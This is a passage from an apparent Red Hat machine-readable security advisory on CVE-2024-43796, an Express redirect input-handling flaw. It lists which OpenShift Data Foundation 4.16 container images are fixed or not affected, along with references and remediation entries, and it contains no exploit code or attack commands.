"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311152"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "express: Improper Input Handling in Express Redirects",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"known_not_affected": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64",
"9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x",
"9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x",
"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le",
"9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le",
"9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64",
"9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x",
"9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x",
"9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x",
"9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64",
"9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-15T08:52:38+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8113"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64",
"9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64",
"9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x",
"9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64",
